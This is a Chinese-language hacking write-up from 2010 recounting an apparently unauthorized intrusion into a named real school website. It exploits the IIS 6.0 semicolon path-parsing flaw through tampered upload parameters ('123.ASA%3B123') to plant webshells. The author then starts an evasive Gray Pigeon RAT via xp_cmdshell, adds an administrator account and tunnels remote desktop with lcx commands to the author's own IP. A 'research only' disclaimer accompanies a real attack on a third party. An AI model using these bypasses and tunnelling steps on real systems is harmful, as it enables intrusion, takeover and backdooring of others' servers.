// by redice 2010.06.19
// redice@163.com
// 仅为研究技术

iis6.0 的路径解析漏洞：


（1）"123.asp/456.jgp"，iis6.0会将456.jpg文件当做asp代码解释执行。

（2）"123.asp;456.jpg"，iis6.0会将456.jpg文件当做asp代码解释执行。



测试网站：www.sngaozhong.com 商南县高级中学，我的母校。


测试步骤如下：


注册一个用户，登录后进入修改信息页面，有上传图像的功能。

上传文件，用winsock expert抓包。

尝试修改包中文件后缀名为123.asp\0.jpg （注意：\0是通过utraedit将该字节值修改为00，一些上传组件会将\0认为是字符串的结束），
nc提交后返回asp.net执行出错信息，看来此路不通。

突然看到文件上传post的目标url中有如下的参数：

directory=uploadfiles&name=time


难道可以修改上传目录？难道可以指定上传文件名称？


测试将directory=uploadfiles修改为directory=hackyou，竟然上传成功了，hackyou目录被创建了，

尝试directory=123.asp，nc返回错误提示，上传失败了。看了此路也不通。

尝试name=name=123.asa%3B123  （%3B是";"url编码的结果），nc返回错误提示，说是检测到文件名中含有非法字符，

再尝试name=name=123.ASA%3B123，上传成功了！！

由于图片木马不便于接收参数，于是利用图片木马生成一个小马，然后利用小马写入大马。 所有过程截图如下：

这个网站是用一个叫做ZDSoft网站生成系统...

利用zdsoft用户图像上传bug，上传图片木马，利用了iis6.0对"123.asp;456.jpg"解析为"123..asp"的bug：




访问上传的图片木马，经测试发现图片木马正常运行了：



传大马：




大马看到的东东：



可以看到这是台内网的服务器，开了3389：


传个免杀的鸽子，用sa调用xp_cmdshell启动鸽子，反向连接：



利用鸽子添加管理员，上传lcx，端口转发到本地：

本地执行：lcx -listen 33891 110

远程执行：lcx -slave 113.139.14.98 33891 127.0.0.1 3389   （113.139.14.98是我的IP）



连接本地的110端口，终于看到远程桌面了：